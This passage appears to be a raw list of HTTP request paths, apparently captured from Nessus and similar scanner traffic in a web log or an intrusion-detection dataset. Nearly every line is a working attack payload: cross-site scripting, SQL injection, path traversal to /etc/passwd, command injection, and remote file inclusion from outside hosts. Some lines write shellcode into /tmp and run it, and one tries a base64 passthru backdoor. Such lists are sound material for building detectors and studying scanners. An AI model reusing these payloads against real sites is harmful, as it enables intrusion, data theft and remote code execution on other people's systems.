content=\"testpwew=1315\">\n/examples/jsp/num/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/cgi-bin/cschatrbox.cgi?command=savesetup&setup=;system('cat /etc/passwd')\n/raanw4ia.php?<script>cross_site_scripting.nasl</script>\n/index.php?news7[\"functions\"]=http://192.168.202.118:8080/zz5thkvtmlgl?\n/o35zot2r.cgi?<script>cross_site_scripting.nasl</script>\n/6wb70v0b.x?<script>cross_site_scripting.nasl</script>\n/<meta http-equiv=set-cookie content=\"testnago=4518\">\n/ht8pn8uq.htm?<script>cross_site_scripting.nasl</script>\n/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/ewc3rz1l.mscgi?<script>document.cookie=\"testkgqo=204;\"</script>\n/examples/jsp/colors/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/t578vqea.html?<meta http-equiv=set-cookie content=\"testsory=7676\">\n/examples/jsp/error/lang/index.php?file=/etc/passwd\n/ap58k3ci.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='\\x0adel q85424597 #\n/examples/jsp/cal?username=\"<script>foo</script\n/nyjgaorz.html?<script>cross_site_scripting.nasl</script>\n/ewc3rz1l.pl?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\\x00\n/cgi-bin/mail.php?id='/**/union/**/select/**/1,2,1331904244,4--&blog=1\n/help.php?q=|ping;-w;10000;-n;1;4.3.2.1|rem;\n/scripts/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,522571337321,4,5,6,7,8,9,10,11--\n/cgi.cgi/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/my sister's hot friend - julia bond/\n/help.php?q=&ver\\xa0>q93695883&rem\\xa0\n/e9rx3ya4.htm?<script>cross_site_scripting.nasl</script>\n/recordings/hw3.cgi?daysonly=0).system('id').(\n/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/manager/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/nmw0do67.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/\n/examples/servlets/servlet/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/jspx/pals-cgi?palsaction=restart&documentname=/etc/passwd\n/fmnveedu.cgi?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/s-csscript/\n/help.php?q='\\x0drm\\x09q79317735\\x09#\n/home.jsf?autoscroll=0,275);//--></script><script>alert('myfaces_tomahawk_autoscroll_xss.nasl'\n/hjdzm96v.asp?<script>document.cookie=\"testbyqe=7474;\"</script>\n/main.php?stuff=\"\\x0auname\\x09>q74494385\\x09#\n/help.php?q=\"ping\\x0c-w\\x0c10000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/scripts/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331909220&lang_crm=../../vtigerservice.php\\x00\n/you've probably noticed this column along the side/\n/cacti/index.php?cid='\n/examples/jsp/sessions/admin/admin.php?sid='\n/m2fpztty.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/javadoc.exe\n/<20060312011649/\n/qczkquis.idc?<script>document.cookie=\"testkwlg=5591;\"</script>\n/t7tm4m0b.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=ping;-w;11000;-n;1;1.2.3.4&rem;\n/fa8p8lr8.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/pls/help/<script>alert('vulnerable')</script>\n/manager/admin/configset.php?settings_dir=/etc/passwd\\x00\n/help.php?q=\"&ver >q86798622&rem \n/l4fz1dqw.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/modules.php?letter=\"><img src=javascript:alert(document.cookie);>&op=modload&name=members_list&file=index\n/82q7ywa8.asp?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/examples/jsp/checkbox/apps/pbcs.dll/misc?url=../../../../../../../../../../../../boot.ini\n/nyjgaorz.jsp?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"|ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/9ko6m4c8.mscgi?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/jw64yq8u.aspx?<script>document.cookie=\"testylfu=1313;\"</script>\n/5o9zq43e.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/ddoworrl.cgi?<script>document.cookie=\"testvlau=8517;\"</script>\n/if69ddo1.kspx?<script>document.cookie=\"testiabz=5220;\"</script>\n/lsoix5h3.htm?<script>cross_site_scripting.nasl</script>\n/scripts/shop.plx/page=nessus1384989384\n/subscript_header/\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=q53544634&frm_user=&scr_height=&scr_width=\n/javascript/apple.exe\n/path_script/createurl.php?formurl=@rfiurl\n/forum.asp?n=`/etc/passwd`|41|80040e14|[microsoft][odbc_sql_server_driver][sql_server]line_1:_incorrect_syntax_near_&#039;`&#039;.\n/6qbynt4f.pl?<script>cross_site_scripting.nasl</script>\n/javascript/auction.exe\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332008335','5'--\n/fo564rei.jspa?<script>cross_site_scripting.nasl</script>\n/servlet/com.newatlanta.servletexec.jsp10servlet/..\\..\\global.asa\n/phpmyadmin//..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd\n/examples/jsp/error/index.php?selskin=../inc/boxleft.inc\\x00&xposbox[l][]=/etc/passwd\\x00\n/hjdzm96v.aspx?<meta http-equiv=set-cookie content=\"testbyqe=7474\">\n/v3axg1p8.pl?<meta http-equiv=set-cookie content=\"testxagh=6987\">\n/examples/jsp/cal/index.php?act=arcade&do=stats&gameid=1'\n/scripts/9pen4xzgztjn.cgi\n/orderinghydrocodonewithoutaprescription/\n/examples/jsp/colors/webplus.exe?script=webplus_install_path.nasl\n/oie504mr.do?<meta http-equiv=set-cookie content=\"testtpby=7052\">\n/javascript/icat.exe\n/examples/jsp/num/main.php?g2_itemid=../../../../../license\\x00\n/scripts/phpnews/sendtofriend.php?mid='1'\n/main.php?logout=\"rm\\x0cq35989384&rem\\x0c\n/awstats/awstats.pl?migrate=|echo;/./tmp/wrkvkjjzem0 > /dev/null &;echo|awstats726408.txt\n/vwmg565s.mscgi?<script>cross_site_scripting.nasl</script>\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"zj\\0003x\\0315\\0200xp1\\0322\\0262\\0377\\0266\\0377\\0001\\0320\" >> /tmp/qcywjpzuja0;echo|awstats457124.txt\n/examples/jsp/num/doc/index.php?s=/etc/passwd\\x00\n/main.php?stuff=\"\\x0asleep\\x098\\x09#\n/javascript/htpasswd.bz2\n/javascript/.passwd.nsf\n/main.php?stuff=&ver\\x09>q57189992&rem\\x09\n/hjdzm96v.pl?<script>document.cookie=\"testbyqe=7474;\"</script>\n/main.php?stuff=\"|ping,-w,9000,-n,1,4.3.2.1|rem,\n/?<meta http-equiv=set-cookie content=\"testylik=3403\">\n/admin/index.php?path_to_script=http://192.168.202.118:8080/2aibfaczmac8??&cmd=ls\n/examples/jsp/cal/webadmin.php?show=/etc/passwd\n/vmi8bb12.aspx?<script>document.cookie=\"testlerc=2575;\"</script>\n/help.php?q=\"ping,-w,11000,-n,1,4.3.2.1|rem,\n/examples/jsp/sessions/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/0u75ldxq.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/iajtej82.php?<script>cross_site_scripting.nasl</script>\n/b4vng02k.exe?<script>document.cookie=\"testtrlh=3672;\"</script>\n/phpmyadmin/documentation.html?phpmyadmin=csc3t31gos8q2h30o9cfk567d1lu5go1../../../../../../../../../../tmp\n/top.php?stuff=\"ver\\x0c>q33687847&rem\\x0c\n/phpmyadmin/admin/addentry.php?phpbb_root_path=/etc/passwd\\x00\n/n1afe1y6.mscgi?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/alienform.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/bn857frh.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/images.exe\n/cgi-bin/index.php?page=/etc/passwd\\x00\n//<body><script/src=\"http://www.example.com/test?rnd=q61318646\"></script>\n/igtf0zon.aspx?<script>cross_site_scripting.nasl</script>\n/prescription-drugs/\n/emailsubscriptionshelp/\n/examples/servlets/servlet/hsx.cgi?show=../../../../../../../../../../../../../etc/passwd\\x00\n/cgi-bin/sewse?/home/httpd/html/sewse/jabber/comment2.jse+/etc/passwd\n/recordings/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/ydexw8by.mscgi?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/6qbynt4f.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/usr.exe\n/cgi-exe/ppdscgi.exe\n/scripts/htsearch?-c/nonexistent\n/<script>cross_site_scripting.nasl</script>.php3\n/javascript/onbound.exe\n/examples/jsp/checkbox/mrtg.cgi?cfg=/../../../../../../../../../etc/passwd\n/examples/jsp/cal/adlayer.php?layerstyle=../../../../../../../etc/passwd\\x00\n/jamie's return to school dinners/\n/o6ebbirj.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d765w06j.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/htbin/fileseek.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/uvazfs7p.do?<script>document.cookie=\"testwtbo=4831;\"</script>\n/en-us/<meta http-equiv=set-cookie content=\"testzgnm=1183\">\n/en-us/account/mylog.html?screen=/etc/passwd\n/syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>\n/cgi-bin/index.php?album=../../../../../../../../../../boot.ini\\x00\n/t3af3tdz.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=uname\\x09>q78171128\\x09#\n/main.php?stuff=ver\\xa0>q57599426&rem\\xa0\n/scripts/4rzefq7dsowk.asp\n/javascript/aliases.exe\n/lmw4r201.jspa?<meta http-equiv=set-cookie content=\"testwews=8477\">\n/copatranscript_20061101/\n/169okeyj.php?<script>document.cookie=\"testxeoi=3573;\"</script>\n/manager/search.pl?form=../../../../../../etc/passwd\\x00\n/<script>document.cookie=\"testotoy=6142;\"</script>\n/bt_subscription/\n/e-mail_subscriptions/\n/examples/jsp/jsp2/el/index.php?op=default&date=200607' union select 1,2111767763,1,1,1,1,1,1,1,1--&blogid=1\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+01+42+00+ff+d0+8b+e3+ff+d7+6a+06+6a+01+6a+02+ff+d0+8b+e8+ff+d7+6a+00+6a+00++>>ctdn\n/xfkun1ku.nsf?<script>cross_site_scripting.nasl</script>\n/javascript/party.exe\n/iisadmpwd/..\\xc0\\xaf../winnt/system32/cmd.exe?/c+dir\n/help.php?q=\"ping -w 7000 -n 1 1.2.3.4|rem \n/help.php?q=\"&rm\\x09q33725356&rem\\x09\n/script>alert('vulnerable')</script>.cfm\n/if69ddo1.htm?<meta http-equiv=set-cookie content=\"testiabz=5220\">\n/................../config.sys\n/0rufe52p.cgi?<script>cross_site_scripting.nasl</script>\n/javascript/ibm.exe\n/chat_transcripts/\n/main.php?stuff=';rm\\x09q87217698\\x09#\n/a0imiuf1.php?<meta http-equiv=set-cookie content=\"testxqrn=4654\">\n/lsoix5h3.x?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/zml.cgi?file=../../../../../../../../../../../../etc/passwd\\x00\n/tukodz3j.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/sensepost.exe?/c+dir\n/main.php?logout=\"\\x0arm\\x09q43175153\\x09#\n/examples/jsp/colors/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/examples/jsp/jsp2/jspx/port.php?proto=tcp'\n/l4fz1dqw.kspx?<script>cross_site_scripting.nasl</script>\n/scripts/index.php?op=default&date=200607' union select 1,596298457,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/t99iadgtkf9h.cfm\n/main.php?stuff=\"rm,q37721326&rem,\n/y8pmygrp.html?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&ping\\xa0-w\\xa09000\\xa0-n\\xa01\\xa01.2.3.4&rem\\xa0\n/jackrabbit/search.jsp?q=%\"<script>alert(1331904189)</script>\n/iajtej82.cgi?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=\";del\\x09q87779896\\x09#\n/qczkquis.kspx?<script>document.cookie=\"testkwlg=5591;\"</script>\n/examples/jsp/jsp2/jspx/webadmin.php?show=/etc/passwd\n/descript/\n/javascript/session.exe\n/main.php?stuff=\"&ping,-w,9000,-n,1,4.3.2.1&rem,\n/top.php?stuff='\\x0drm q84295152 #\n/script/_conf/core/common-tpl-vars.php?confdir=http://cirt.net/rfiinc.txt??\n/scripts/index.php?id='union/**/select/**/0,0,281177442,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/examples/jsp/sessions/coin_includes/constants.php?_ccfg[_pkg_path_incl]=/etc/passwd\\x00\n/edv3mapy.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/l.exe\n/search/submit.php?config[\"sipssys\"]=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/search.jsp?q=%\"<script>alert(1331909171)</script>\n/help.php?q=&ver,>q16465625&rem,\n/javascript/specials.exe\n/examples/servlets/servlet/listrec.pl?app=qmh-news&template=;ls /etc|\n/phpmyadmin/resetpw.php?email=../../../../../../../../../../../../etc/passwd\n/en-us/account/autohtml.php?op=modload&mailfile=x&name=../../../../../../../../etc/passwd\n/ows-bin/vssetcookie.exe\n/scripts/docs/changes\n/scgi-bin/pfdispaly.cgi?'\\x0a/bin/cat /etc/passwd|'\n/m5103snj.php?<script>cross_site_scripting.nasl</script>\n/l13b77e5.html?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/top.php?stuff=ver\\x09>q91857824&rem\\x09\n/en-us/account/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/admin/components/com_fm/fm.install.php?lm_absolute_path=../../../&install_dir=http://192.168.202.96:8080/ipb5ri??\n/cgi-bin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/rbec2ohx.exe?<script>cross_site_scripting.nasl</script>\n<script>document.cookie=\"testcmax=9270;\"</script>\n/3m5knyc4.html?<script>document.cookie=\"testbgqj=6434;\"</script>\n/fmnveedu.php?<script>document.cookie=\"testgfbr=7014;\"</script>\n/l752x1ry.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/phpmyadmin/documentation.html?phpmyadmin=map47fckapd3c2j9d7svslcjakhdm1fs\" or (sleep(4)+1) limit 1 -- \n/b1q8bywu.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/serve.exe\n/scgi-bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/main.php?logout=\"|ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b1.2.3.4|rem\\x0b\n/t578vqea.aspx?<script>document.cookie=\"testsory=7676;\"</script>\n/examples/jsp/sessions/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/examples/jsp/calsearch_results.dot?search_query=nessus\"><script>alert('dotcms_search_query_xss.nasl')</script>/\n/main.php?stuff=ver\\xa0>q67222935&rem\\xa0\n/iv5vkgam.asp?<meta http-equiv=set-cookie content=\"testfosd=94\">\n/top.php?stuff=\"|ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/dslpwt15.aspx?<script>document.cookie=\"testtkio=5454;\"</script>\n/fo564rei.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/_mem_bin/..%u00255c..%u00255c/winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/7uz3ok60.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/shoutbox.exe\n/raanw4ia.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"del\\x0bq67582951&rem\\x0b\n/scripts/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20\n/xsqln7eb.php3?<script>document.cookie=\"testpcbb=9254;\"</script>\n/help.php?q='uname >q62656229 #\n/rv98iwjp.html?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/d765w06j.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/fmnveedu.nsf?<meta http-equiv=set-cookie content=\"testgfbr=7014\">\n/en-us/n9xlumt5.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/./tmp/tvwonjvwux.sh+>+/dev/null+&').\"]=1\n/examples/servlets/servlet/index.php?op=default&date=200607' union select 1,856108099,1,1,1,1,1,1,1,1--&blogid=1\n/scripts/day.php\n/scripts/index.php?option=frontpage&itemid=2|system(id)|1331908729\n/examples/jsp/error/admin/admin.php?sid=0'\n/help.php?q=\"&uname\\x09>q57946156\\x09#\n/scripts/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/scriptsearchdaily/\n/<meta http-equiv=set-cookie content=\"testgfjr=1286\">\n/htbin/testcgi.exe\n/help.php?q='uname\\x09>q19574333\\x09#\n/manager/top.php?header=../../../../../../../../etc/passwd\n/6dlc2zm9.exe?<meta http-equiv=set-cookie content=\"testqpux=4016\">\n/examples/jsp/error/server.pt?open=space&name=\";}</script><script>alert('plumtree_name_xss.nasl')</script>\n/cacti/admin/configset.php?settings_dir=/etc/passwd\\x00\n/zv8tv7h8.nsf?<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/scripts/search.scr.php?globals[pth][classes]=http://192.168.202.118:8080/ghl9il??\n/scripts/qbch5ojumj32.php3\n/<meta http-equiv=set-cookie content=\"testcqwz=9752\">\n/help.php?q=;uname\\x09>q84834127\\x09#\n/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904419',null,null,null,null --\n/examples/jsp/jsp2/jspx/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/examples/jsp/num/webcart.cgi?config=mountain&change=yes&nextpage=;id|&code=phold\n/index.php?node=system&op=block<script>alert(\"wvs-xss-magic-string-413305588088\")</script>&block=3&bop=more\n/igtf0zon.asp?<script>cross_site_scripting.nasl</script>\n/d7ktpmcq.htm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/testcgi.exe\n/de3v2dd9.jsp?<script>cross_site_scripting.nasl</script>\n/n9xlumt5.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=rm;q27761754&rem;\n/hipkz026.aspx?<script>document.cookie=\"testyrbs=2855;\"</script>\n/phpmyadmin/documentation.html?phpmyadmin=<<<<<<<<<<foo\"bar'204>>>>>\n/examples/jsp/checkbox/phptonuke.php?filnavn=/etc/passwd\n/main.php?logout=\"&rm,q77644543&rem,\n/gy23xnjq.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout=\"uname >q44662571 #\n/en-us/account/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/help.php?q=\"ver >q97915511&rem \n/main.php?stuff=\"ping,-w,10000,-n,1,1.2.3.4&rem,\n/components/com_mospray/scripts/admin.php?basedir=http://192.168.202.96:8080/4dckqcc0acprbz??&cmd=id\n/scripts/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/top.php?stuff=ping;-w;10000;-n;1;1.2.3.4&rem;\n/javascript/children.exe\n/uvazfs7p.asp?<script>document.cookie=\"testwtbo=4831;\"</script>\n/serverscripts/\n/jackrabbit/search.jsp?q=%\"<script>alert(1332009303)</script>\n/examples/jsp/error/sugarcrm/modules/users/login.php?theme=../../../../../../../etc/passwd\\x00\n/main.php?stuff=\"rm\\x09q91227717\\x09#\n/main.php?logout=\"&rm\\x0cq99238383&rem\\x0c\n/cgi-bin/lib/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/examples/jsp/jsp2/jspx/index.cfm?fuseaction=category.display&category_id='\n/help.php?q=&ver >q99146784&rem \n/nyjgaorz.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/awstats/awstats.pl?migrate=|echo;echo x;echo|awstats969999.txt\n/examples/jsp/num/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/help.php?q='rm q62656229 #\n/javascript/motd.exe\n/help.php?q=&ver >q86966717&rem \n/0z575z74.x?<script>document.cookie=\"testuhsv=9753;\"</script>\n/yver8r9o.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/../../../../../windows/win.ini\n/cgi-perl/cgi-test.exe\n/top.php?stuff=\"&ver,>q25287739&rem,\n/<script>document.cookie=\"testttvs=7163;\"</script>\n/help.php?q=\"rm\\xa0q23773279&rem\\xa0\n/7o5qp766.htm?<script>cross_site_scripting.nasl</script>\n/javascript/domains.exe\n/scripts/new_images.php?order=linpha_order_sql_injection.nasl_1331923194\n/help.php?q=ver >q66395663&rem \n/help.php?q=\"&rm,q46141422&rem,\n/port.php?proto=tcp'\n/examples/jsp/error/base_qry_common.php?base_path=/etc/passwd\\x00\n/scripts/shopexd.asp?catalogid='42\n/main.inc.php?pathtoscript=http://192.168.202.96:8080/4dckqcc0acprbz?\n/<script>alert('vulnerable')</script>.shtml\n/bdf_scripts/\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+del+olnb\n/user.php?uname=1&module=ns-lostpassword&op=<script>alert(414066083539)</script>\n/recordings/calendar.php?month=' union select 1,1,'1331918998','calendarix_month_sql_injection.nasl',1 #\n/examples/jsp/cal/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//\n/help.php?q=\"rm\\x0bq87717318&rem\\x0b\n/javascript/htpasswd.cc\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=lfu_7eugo7nlzqnjz\n/top.php?stuff=';sleep\\x0911\\x09#\n/scriptingnews2/\n/edzaia0i.html?<script>cross_site_scripting.nasl</script>\n/main.php?stuff=';del q22931533 #\n/i2n4v4rl.cfm?<script>cross_site_scripting.nasl</script>\n/scripts/search.jsp?q=%\"<script>alert(1331923191)</script>\n/scripts/spt--forumtopics.php?forumid=-9 union select null,null,null,1332010406,4,5\n/ju0u7kfo.nsf?<script>cross_site_scripting.nasl</script>\n/examples/servlets/servlet/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/andromeda.php?q=s&sm=fi&s=<iframe src=javascript:alert(%27wvs-xss-magic-string-411566083439%27)></iframe>&x=9&y=7\n/7o5qp766.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/docs/index.php?lang=/../../../../../../../../../../etc/passwd\\x00\n/examples/jsp/jsp2/el/shoutbox.php?conf=../\n/en-us/ddoworrl.cfm?<meta http-equiv=set-cookie content=\"testvlau=8517\">\n/bn857frh.htm?<script>cross_site_scripting.nasl</script>\n/d765w06j.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/checkbox/demos/demo.browse.php?filename=/etc/passwd\n/q703m78q.x?<meta http-equiv=set-cookie content=\"testvowq=604\">\n/main.php?stuff=\"&del q44697755 #\n/javascript/.htaccess.sfish/'\"'\"'\"'\"\n/nyvbv05h.exe?<script>document.cookie=\"testftxz=5980;\"</script>\n/examples/servlets/servlet/index.php?chemin=../../../../../../..//etc\n/news/index.dot?id=../../../../../../../../../../../..//boot.ini\\x00.jpg\n/mv8wxfy9.php3?<meta http-equiv=set-cookie content=\"testrhbc=8184\">\n/jnt3f86c.cfc?<meta http-equiv=set-cookie content=\"testcmax=9270\">\n/main.php?stuff=\"ping\\x0b-w\\x0b7000\\x0b-n\\x0b1\\x0b4.3.2.1|rem\\x0b\n/examples/jsp/colors/core/editor.php?editor_insert_bottom=/etc/passwd\n/odzk29aa.htm?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/sourcecode_scripts/\n/ghswfouu.fts?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/help.php?q=\"&rm,q45293431&rem,\n/main.php?logout='\\x0asleep\\x0910\\x09#\n/o6ebbirj.htm?<script>cross_site_scripting.nasl</script>\n/static//%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/etc/passwd\n/82q7ywa8.htm?<meta http-equiv=set-cookie content=\"testpwew=1315\">\n/scripts/index.php?id='union/**/select/**/0,0,553136338,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/t7tm4m0b.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1331919008,1645922045 -- \n/phpmyadmin/www/delivery/ac.php?bannerid=-1331904221+or+1=1+--+';passthru(base64_decode($_server[http_nessus_ucypkczy]));die;/*\n/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/i2n4v4rl.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/colors/sojourn.cgi?cat=../../../../../etc/passwd\\x00\n/main.php?logout=';del\\x09q79392194\\x09#\n/admin/scripts/fckeditor/\n/opensiteadmin/scripts/classes/databasemanager.php?path=http://192.168.202.118:8080/tzhfyzkbomspvm?\\x00\n/javascript/edu.exe\n/manager/spaw/dialogs/confirm.php?spaw_root=/etc/passwd\\x00\n/help.php?q=ping;-w;8000;-n;1;1.2.3.4|rem;\n/phpmyadmin/documentation.html?phpmyadmin='\"\n/mail.php?id='/**/union/**/select/**/1,2,1331923205,4--&blog=1\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\\x00\n/iajtej82.cfc?<script>cross_site_scripting.nasl</script>\n/script/menu/menuadministration.php?path_inc=http://192.168.202.118:8080/ghl9il?\n/fc9t54l7.exe?<meta http-equiv=set-cookie content=\"testggad=2000\">\n/cacti/showproduct.php?product=1'\n/main.php?logout=\"ping\\x0b-w\\x0b9000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/interscan/cgi-bin/ftpsave.dll?i'm here\n/exchange/..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v..\\xc0%9v../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/bxnyrhmh.x?<script>document.cookie=\"testmjct=1867;\"</script>\n/7uz3ok60.pl?<script>cross_site_scripting.nasl</script>\n/5o9zq43e.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff=\"&rm q33239588 #\n/javascript/serial.exe\n/cgi-bin/cvslog.cgi?file=<script>alert('vulnerable')</script>\n/main.php?logout=\"|ping\\xa0-w\\xa011000\\xa0-n\\xa01\\xa01.2.3.4|rem\\xa0\n/cgi-home/pfdispaly.cgi?../../../../../../../../../../etc/passwd\n/scripts/qbch5ojumj32.inc\n/hrttz9fj.idc?<meta http-equiv=set-cookie content=\"testtbjy=7334\">\n/recordings/webspirs.cgi?sp.nextform=../../../../../../../../../etc/passwd\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+echo+db+00+00+00+61+c3+60+52+53+33+c0+e8+0a+00+00+00+5b+5a+03+d8+2b+d0+75+ef+61+c3++>>ctdn\n/javascript/edit.exe\n/main.php?logout=\"ping\\x09-w\\x0910000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/ydexw8by.do?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/cgi-bin/search.jsp?q=%\"<script>alert(1331909171)</script>\n/ghswfouu.exe?<meta http-equiv=set-cookie content=\"testsqmm=5713\">\n/recordings/kb.cgi?view='&lang=en\n/htbin/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd\n/recordings/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/admin/doeditconfig.php?thispath=../includes&config[path]=http://192.168.202.118:8080/iroy1gvqrrqu?\n/javascript/bins.exe\n/examples/jsp/jsp2/jspx/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331923189&lang_crm=../../vtigerservice.php\\x00\n/cgi-bin/index.php?x=browse&category='union select '1','2','pixelpost_category_sql_injection.nasl','1332010414','5'--\n/main.php?logout='\\x0auname\\x09>q29624474\\x09#\n/top.php?stuff=\"&ver\\x0c>q18822244&rem\\x0c\n/o6ebbirj.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bzuf9ozq.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/help.php?q=\"&ping\\x0b-w\\x0b11000\\x0b-n\\x0b1\\x0b4.3.2.1&rem\\x0b\n/cacti/docs.php?doc=../jpgraph-1.12.1/docs/index\n/examples/jsp/jsp2/jspx/directory.php?dir=;cat 